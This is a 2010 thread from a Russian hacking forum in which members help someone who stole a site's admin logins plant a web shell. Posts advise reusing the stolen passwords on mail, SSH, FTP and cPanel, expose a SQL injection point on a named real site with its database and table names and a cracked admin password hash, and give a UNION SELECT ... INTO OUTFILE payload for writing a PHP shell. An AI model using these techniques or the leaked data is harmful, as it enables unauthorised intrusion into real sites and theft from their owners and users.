HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.10.2010, 06:47
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

Цитата:
Сообщение от GroM88  
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #2  
Старый 06.10.2010, 07:09
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

Цитата:
Сообщение от pinch  
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
БД

Цитата:
Сообщение от None  
master
tempdb
model
msdb
telecom
zaokolmi
zags
р–master
Таблы с БД zaokolmi

Цитата:
Сообщение от None  
dtproperties
foto_catalog
auto_catalog
admin
pwd name

009091b3166dcbe1aa6202a97bcda08a zao

пароль от хеша 123456 вроде

Сайты на сервере(ReverseIP): больше 50

кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #3  
Старый 06.10.2010, 09:26
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

shell_code плиииз запросы в личку
 
Ответить с цитированием

  #4  
Старый 06.10.2010, 18:48
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
С нами: 8693835

Репутация: 0
По умолчанию

Цитата:
Сообщение от GroM88  
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
site?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.

и да Требуются привилегии FILE
 
Ответить с цитированием

  #5  
Старый 06.10.2010, 19:35
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
С нами: 9017758

Репутация: 13
По умолчанию

Цитата:
Сообщение от GroM88  
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
Почитай (Заливка шелла через MYSQL)
 
Ответить с цитированием

  #6  
Старый 06.10.2010, 20:45
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

а d1v что написал то ? =\
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #7  
Старый 07.10.2010, 02:42
nemans
Новичок
Регистрация: 03.12.2006
Сообщений: 24
С нами: 10230151

Репутация: 7
По умолчанию

Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.
 
Ответить с цитированием

  #8  
Старый 07.10.2010, 03:07
AdDa
Новичок
Регистрация: 19.01.2007
Сообщений: 1
С нами: 10162238

Репутация: 5
По умолчанию

Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).
 
Ответить с цитированием

  #9  
Старый 07.10.2010, 10:51
high_rez
Новичок
Регистрация: 23.08.2009
Сообщений: 1
С нами: 8798520

Репутация: 0
По умолчанию

Ужасно глупый вопрос.

Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?

В моем браузере отключены скритпы.
 
Ответить с цитированием

  #10  
Старый 07.10.2010, 11:04
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами: 8456912

Репутация: 17
По умолчанию

Покажи ссылку.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.